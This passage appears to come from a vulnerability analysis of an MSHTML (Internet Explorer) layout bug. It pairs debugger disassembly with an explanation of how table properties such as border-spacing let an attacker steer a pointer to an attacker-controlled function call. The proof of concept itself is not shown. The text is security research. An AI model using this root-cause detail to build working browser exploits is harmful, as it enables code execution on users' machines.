 00007ffe`8f330a62 e8793c64ff      call    MSHTML!Layout::Patchable<Layout::PatchableArrayData<Layout::MultiColumnBox::SMultiColumnBoxItem> >::Readable (00007ffe`8e9746e0)
 00007ffe`8f330a67 488b30          mov     rsi,qword ptr [rax]
 00007ffe`8f330a6a 488b06          mov     rax,qword ptr [rsi]
 00007ffe`8f330a6d 488bb848030000  mov     rdi,qword ptr [rax+348h]
 00007ffe`8f330a74 488bcf          mov     rcx,rdi
 00007ffe`8f330a77 ff155b95d700    call    qword ptr [MSHTML!_guard_check_icall_fptr (00007ffe`900a9fd8)]
 00007ffe`8f330a7d 488bce          mov     rcx,rsi
 00007ffe`8f330a80 ffd7            call    rdi
 On 00007ffe`8f330a51 rxc is read from rbp and MSHTML!Layout::Patchable<Layout::PatchableArrayData<Layout::MultiColumnBox::SMultiColumnBoxItem> >::Readable is called which sets up rax. rcx is supposed to point to another object type, but in the PoC it points to an array of 32-bit integers allocated in Array<Math::SLayoutMeasure>::Create. This array stores offsets of table columns and the values can be controlled by an attacker (with some limitations).
 On 00007ffe`8f330a59 the crash occurs because rax points to uninitialized memory.
 However, an attacker can affect rax by modifying table properties such as border-spacing and the width of the firs th element. Let's see what happens if an attacker can point rax to the memory he/she controls.
 Assuming an attacker can pass a check on line 00007ffe`8f330a59, MSHTML!Layout::Patchable<Layout::PatchableArrayData<Layout::MultiColumnBox::SMultiColumnBoxItem> >::Readable is called again with the same arguments. After that, through a series of dereferences starting from rax, a function pointer is obtained and stored in rdi. A CFG check is made on that function pointer and, assuming it passes, the attacker-controlled function pointer is called on line 00007ffe`8f330a80.
 -->